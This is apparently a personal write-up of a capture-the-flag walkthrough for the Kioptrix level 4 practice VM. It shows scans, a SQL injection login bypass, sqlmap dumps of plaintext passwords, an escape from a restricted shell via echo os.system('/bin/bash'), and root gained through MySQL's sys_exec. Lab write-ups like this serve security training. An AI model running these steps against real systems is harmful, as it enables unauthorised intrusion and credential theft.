This is the final box of the Kioptrix series.Last 3 box is sample and nice but this one is little more harder than older box.Ok. talk is cheap.
Start scanning my network with netdiscover.
┌─[[email protected]]─[~/Desktop] └──> netdiscover Currently scanning: 192.168.20.0/16 | Screen View: Unique Hosts 3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.1.1 60:e3:27:be:75:78 1 60 TP-LINK TECHNOLOGIES CO.,LTD. 192.168.1.70 08:00:27:c8:67:ee 1 60 PCS Systemtechnik GmbH 192.168.1.100 34:97:f6:c3:0b:66 1 60 ASUSTek COMPUTER INC.
Target ip is 192.168.1.1, Normally scan the target with nmap version detected.
┌─[✗]─[[email protected]]─[~/Desktop] └──> nmap -sV 192.168.1.70 Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-08 09:33 +0630 Nmap scan report for 192.168.1.70 Host is up (0.00024s latency). Not shown: 566 closed ports, 430 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0) 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) MAC Address: 08:00:27:C8:67:EE (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 14.17 seconds
Let’s me check http first and scan dir dir with dirb.
┌─[✗]─[[email protected]]─[~/Desktop] └──> dirb http://192.168.1.70 -r ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Mon Jan 8 09:34:46 2018 URL_BASE: http://192.168.1.70/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt OPTION: Not Recursive ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.1.70/ ---- + http://192.168.1.70/cgi-bin/ (CODE:403|SIZE:327) ==> DIRECTORY: http://192.168.1.70/images/ + http://192.168.1.70/index (CODE:200|SIZE:1255) + http://192.168.1.70/index.php (CODE:200|SIZE:1255) ==> DIRECTORY: http://192.168.1.70/john/ + http://192.168.1.70/logout (CODE:302|SIZE:0) + http://192.168.1.70/member (CODE:302|SIZE:220) + http://192.168.1.70/server-status (CODE:403|SIZE:332) ----------------- END_TIME: Mon Jan 8 09:34:48 2018 DOWNLOADED: 4612 - FOUND: 6
I found the login page and try with sql login query bypass.
Username admin and password is ‘ (single quote). it show the sql error. I understand that it is sql vulnerable to exploit.
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/checklogin.php on line 28 Wrong Username or Password
now open sqlmap and grep all data from database;
┌─[[email protected]]─[~/Desktop] └──> sqlmap -u "http://192.168.1.70/checklogin.php" --data="myusername=admin&mypassword=admin&Submit=Login" -p mypassword --current-db ___ __H__ ___ ___[.]_____ ___ ___ {1.1.12#stable} |_ -| . [.] | .'| . | |___|_ [)]_|_|_|__,| _| |_|V |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 09:39:48 [09:39:50] [INFO] resuming back-end DBMS 'mysql' [09:39:50] [INFO] testing connection to the target URL [09:39:50] [INFO] heuristics detected web page charset 'ascii' sqlmap resumed the following injection point(s) from stored session: --- Parameter: mypassword (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: myusername=jDWI&mypassword=-8663' OR 3851=3851#&Submit=Login Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: myusername=jDWI&mypassword=' OR SLEEP(5)-- tKEJ&Submit=Login --- [09:39:50] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 8.04 (Hardy Heron) web application technology: PHP 5.2.4, Apache 2.2.8 back-end DBMS: MySQL >= 5.0.12 [09:39:50] [INFO] fetching current database [09:39:50] [INFO] resumed: members current database: 'members' [09:39:50] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.70' [*] shutting down at 09:39:50
Grep table from member database;
┌─[[email protected]]─[~/Desktop] └──> sqlmap -u "http://192.168.1.70/checklogin.php" --data="myusername=admin&mypassword=admin&Submit=Login" -p mypassword --tables -D members ___ __H__ ___ ___[)]_____ ___ ___ {1.1.12#stable} |_ -| . ['] | .'| . | |___|_ [,]_|_|_|__,| _| |_|V |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 09:40:40 [09:40:40] [INFO] resuming back-end DBMS 'mysql' [09:40:40] [INFO] testing connection to the target URL [09:40:40] [INFO] heuristics detected web page charset 'ascii' sqlmap resumed the following injection point(s) from stored session: --- Parameter: mypassword (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: myusername=jDWI&mypassword=-8663' OR 3851=3851#&Submit=Login Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: myusername=jDWI&mypassword=' OR SLEEP(5)-- tKEJ&Submit=Login --- [09:40:40] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 8.04 (Hardy Heron) web application technology: PHP 5.2.4, Apache 2.2.8 back-end DBMS: MySQL >= 5.0.12 [09:40:40] [INFO] fetching tables for database: 'members' [09:40:40] [INFO] fetching number of tables for database 'members' [09:40:40] [INFO] resumed: 1 [09:40:40] [INFO] resumed: members Database: members [1 table] +---------+ | members | +---------+ [09:40:40] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.70' [*] shutting down at 09:40:40
Grep columns from members table
┌─[[email protected]]─[~/Desktop] └──> sqlmap -u "http://192.168.1.70/checklogin.php" --data="myusername=admin&mypassword=admin&Submit=Login" -p mypassword --columns -T members -D members ___ __H__ ___ ___[(]_____ ___ ___ {1.1.12#stable} |_ -| . ["] | .'| . | |___|_ [,]_|_|_|__,| _| |_|V |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 09:41:41 [09:41:42] [INFO] resuming back-end DBMS 'mysql' [09:41:42] [INFO] testing connection to the target URL [09:41:42] [INFO] heuristics detected web page charset 'ascii' sqlmap resumed the following injection point(s) from stored session: --- Parameter: mypassword (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: myusername=jDWI&mypassword=-8663' OR 3851=3851#&Submit=Login Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: myusername=jDWI&mypassword=' OR SLEEP(5)-- tKEJ&Submit=Login --- [09:41:42] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 8.04 (Hardy Heron) web application technology: PHP 5.2.4, Apache 2.2.8 back-end DBMS: MySQL >= 5.0.12 [09:41:42] [INFO] fetching columns for table 'members' in database 'members' [09:41:42] [INFO] resumed: 3 [09:41:42] [INFO] resumed: id [09:41:42] [INFO] resumed: int(4) [09:41:42] [INFO] resumed: username [09:41:42] [INFO] resumed: varchar(65) [09:41:42] [INFO] resumed: password [09:41:42] [INFO] resumed: varchar(65) Database: members Table: members [3 columns] +----------+-------------+ | Column | Type | +----------+-------------+ | id | int(4) | | password | varchar(65) | | username | varchar(65) | +----------+-------------+ [09:41:42] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.70' [*] shutting down at 09:41:42
Final dump the data from columns.
┌─[[email protected]]─[~/Desktop] └──> sqlmap -u "http://192.168.1.70/checklogin.php" --data="myusername=admin&mypassword=admin&Submit=Login" -p mypassword --dump -C username,password -T members -D members ___ __H__ ___ ___[)]_____ ___ ___ {1.1.12#stable} |_ -| . [)] | .'| . | |___|_ ["]_|_|_|__,| _| |_|V |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 09:42:24 [09:42:24] [INFO] resuming back-end DBMS 'mysql' [09:42:24] [INFO] testing connection to the target URL [09:42:24] [INFO] heuristics detected web page charset 'ascii' sqlmap resumed the following injection point(s) from stored session: --- Parameter: mypassword (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: myusername=jDWI&mypassword=-8663' OR 3851=3851#&Submit=Login Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: myusername=jDWI&mypassword=' OR SLEEP(5)-- tKEJ&Submit=Login --- [09:42:24] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 8.04 (Hardy Heron) web application technology: PHP 5.2.4, Apache 2.2.8 back-end DBMS: MySQL >= 5.0.12 [09:42:24] [INFO] fetching entries of column(s) 'password, username' for table 'members' in database 'members' [09:42:24] [INFO] fetching number of column(s) 'password, username' entries for table 'members' in database 'members' [09:42:24] [INFO] resumed: 2 [09:42:24] [INFO] resumed: ADGAdsafdfwt4gadfga== [09:42:24] [INFO] resumed: robert [09:42:24] [INFO] resumed: MyNameIsJohn [09:42:24] [INFO] resumed: john Database: members Table: members [2 entries] +----------+-----------------------+ | username | password | +----------+-----------------------+ | robert | ADGAdsafdfwt4gadfga== | | john | MyNameIsJohn | +----------+-----------------------+
we already notice ssh open. So try to login with this info. Remember all password to try login to get the flag more faster.
└──> ssh [email protected] [email protected]'s password: Permission denied, please try again. [email protected]'s password: Welcome to LigGoat Security Systems - We are Watching == Welcome LigGoat Employee == LigGoat Shell is in place so you don't screw up Type '?' or 'help' to get the list of allowed commands robert:~$ ls -al total 24 drwxr-xr-x 2 robert robert 4096 2012-02-04 18:53 . drwxr-xr-x 5 root root 4096 2012-02-04 18:05 .. -rw-r--r-- 1 robert robert 220 2012-02-04 18:05 .bash_logout -rw-r--r-- 1 robert robert 2940 2012-02-04 18:05 .bashrc -rw-r--r-- 1 robert robert 5 2012-02-04 18:59 .lhistory -rw-r--r-- 1 robert robert 586 2012-02-04 18:05 .profile robert:~$ cat /etc/passwd *** unknown command: cat robert:~$
Login success but not working well, so i try to bypass the shell. echo os.system(‘/bin/bash’)
robert:~$ echo os.system('/bin/bash')
[email protected]:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:1000:loneferret,,,:/home/loneferret:/bin/bash
john:x:1001:1001:,,,:/home/john:/bin/kshell
robert:x:1002:1002:,,,:/home/robert:/bin/kshell
Yes it work. Awesome 😉 . and add some fixed to work well for terminal.
[email protected]:/$ clear 'xterm-256color': unknown terminal type. [email protected]:/$ export TERM=xterm
[email protected]ix4:/var/www$ ls -al total 44 drwxr-xr-x 5 root root 4096 2018-01-07 21:55 . drwxr-xr-x 14 root root 4096 2012-02-04 09:57 .. -rw-r--r-- 1 root root 1477 2012-02-06 11:31 checklogin.php -rw-r--r-- 1 root root 298 2012-02-04 11:11 database.sql drwxr-xr-x 2 root root 4096 2012-02-06 11:44 images -rw-r--r-- 1 root root 1255 2012-02-06 12:07 index.php drwxr-xr-x 2 root root 4096 2012-02-04 18:33 john -rw-r--r-- 1 root root 176 2012-02-04 12:39 login_success.php -rw-r--r-- 1 root root 78 2012-02-04 11:33 logout.php -rw-r--r-- 1 root root 606 2012-02-06 15:42 member.php drwxr-xr-x 2 root root 4096 2012-02-04 18:30 robert [email protected]:/var/www$ cat checklogin.php | head -n 6 <?php ob_start(); $host="localhost"; // Host name $username="root"; // Mysql username $password=""; // Mysql password $db_name="members"; // Database name
Now i know the mysql password is empty with user root. In this step, i try to root the kernel but gcc not install. So let’s try another method. I search the process that running with root access.
[email protected]:/var/www$ ps -ef | grep root root 1 0 0 21:58 ? 00:00:00 /sbin/init root 2 0 0 21:58 ? 00:00:00 [kthreadd] root 3 2 0 21:58 ? 00:00:00 [migration/0] root 4 2 0 21:58 ? 00:00:00 [ksoftirqd/0] root 5 2 0 21:58 ? 00:00:00 [watchdog/0] root 6 2 0 21:58 ? 00:00:00 [events/0] root 7 2 0 21:58 ? 00:00:00 [khelper] root 41 2 0 21:58 ? 00:00:00 [kblockd/0] root 44 2 0 21:58 ? 00:00:00 [kacpid] root 45 2 0 21:58 ? 00:00:00 [kacpi_notify] root 90 2 0 21:58 ? 00:00:00 [kseriod] root 129 2 0 21:58 ? 00:00:00 [pdflush] root 130 2 0 21:58 ? 00:00:00 [pdflush] root 131 2 0 21:58 ? 00:00:00 [kswapd0] root 173 2 0 21:58 ? 00:00:00 [aio/0] root 1265 2 0 21:58 ? 00:00:00 [ata/0] root 1268 2 0 21:58 ? 00:00:00 [ata_aux] root 1277 2 0 21:58 ? 00:00:00 [scsi_eh_0] root 1280 2 0 21:58 ? 00:00:00 [scsi_eh_1] root 1299 2 0 21:58 ? 00:00:00 [ksuspend_usbd] root 1306 2 0 21:58 ? 00:00:00 [khubd] root 2026 2 0 21:58 ? 00:00:00 [scsi_eh_2] root 2238 2 0 21:58 ? 00:00:00 [kjournald] root 2405 1 0 21:58 ? 00:00:00 /sbin/udevd --daemon root 2654 2 0 21:58 ? 00:00:00 [kpsmoused] root 3927 1 0 21:58 tty4 00:00:00 /sbin/getty 38400 tty4 root 3928 1 0 21:58 tty5 00:00:00 /sbin/getty 38400 tty5 root 3932 1 0 21:58 tty2 00:00:00 /sbin/getty 38400 tty2 root 3934 1 0 21:58 tty3 00:00:00 /sbin/getty 38400 tty3 root 3937 1 0 21:58 tty6 00:00:00 /sbin/getty 38400 tty6 root 3995 1 0 21:58 ? 00:00:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg root 4016 1 0 21:58 ? 00:00:00 /usr/sbin/sshd root 4072 1 0 21:58 ? 00:00:00 /bin/sh /usr/bin/mysqld_safe root 4114 4072 0 21:58 ? 00:00:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root - root 4116 4072 0 21:58 ? 00:00:00 logger -p daemon.err -t mysqld_safe -i -t mysqld root 4189 1 0 21:58 ? 00:00:00 /usr/sbin/nmbd -D root 4191 1 0 21:58 ? 00:00:00 /usr/sbin/smbd -D root 4205 4191 0 21:58 ? 00:00:00 /usr/sbin/smbd -D root 4206 1 0 21:58 ? 00:00:00 /usr/sbin/winbindd root 4219 4206 0 21:58 ? 00:00:00 /usr/sbin/winbindd root 4238 1 0 21:58 ? 00:00:00 /usr/sbin/cron root 4260 1 0 21:58 ? 00:00:00 /usr/sbin/apache2 -k start root 4317 1 0 21:58 tty1 00:00:00 /sbin/getty 38400 tty1 root 4390 4016 0 22:22 ? 00:00:00 sshd: robert [priv] robert 4445 4395 0 22:29 pts/0 00:00:00 grep root
yes. I found mysql is running as root access.
root 4114 4072 0 21:58 ? 00:00:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root -
Ok Try to login at mysql.
[email protected]:/var/www$ mysql -h localhost -u root -p Enter password: Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 16 Server version: 5.0.51a-3ubuntu5.4 (Ubuntu) Type 'help;' or '\h' for help. Type '\c' to clear the buffer. mysql> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | members | | mysql | +--------------------+ 3 rows in set (0.00 sec) mysql>
it work and i search google how to root from mysql. and i found the nice trick
https://thehackernews.com/2016/11/mysql-zero-day-exploits.html
Mysql also can run as terminal with sys_exec function. So i try to add root permission to my current account.
select sys_exec('usermod -a -G admin robert');
Got Root!. Nice trick and love to root. Finally, we need to show POC to read flag file.
[email protected]:/var/www# cd /root/ [email protected]:~# ls -al total 44 drwxr-xr-x 4 root root 4096 2012-02-06 18:46 . drwxr-xr-x 21 root root 4096 2012-02-06 18:41 .. -rw------- 1 root root 254 2018-01-07 21:56 .bash_history -rw-r--r-- 1 root root 2227 2007-10-20 07:51 .bashrc -rw-r--r-- 1 root root 625 2012-02-06 10:48 congrats.txt -rw-r--r-- 1 root root 1 2012-02-05 10:38 .lhistory drwxr-xr-x 8 loneferret loneferret 4096 2012-02-04 17:01 lshell-0.9.12 -rw------- 1 root root 1 2012-02-05 10:38 .mysql_history -rw------- 1 root root 5 2012-02-06 18:38 .nano_history -rw-r--r-- 1 root root 141 2007-10-20 07:51 .profile drwx------ 2 root root 4096 2012-02-06 11:43 .ssh [email protected]:~# cat congrats.txt Congratulations! You've got root. There is more then one way to get root on this system. Try and find them. I've only tested two (2) methods, but it doesn't mean there aren't more. As always there's an easy way, and a not so easy way to pop this box. Look for other methods to get root privileges other than running an exploit. It took a while to make this. For one it's not as easy as it may look, and also work and family life are my priorities. Hobbies are low on my list. Really hope you enjoyed this one. If you haven't already, check out the other VMs available on: www.kioptrix.com Thanks for playing, loneferret [email protected]:~#
Thanks for reading. Happy Hacking..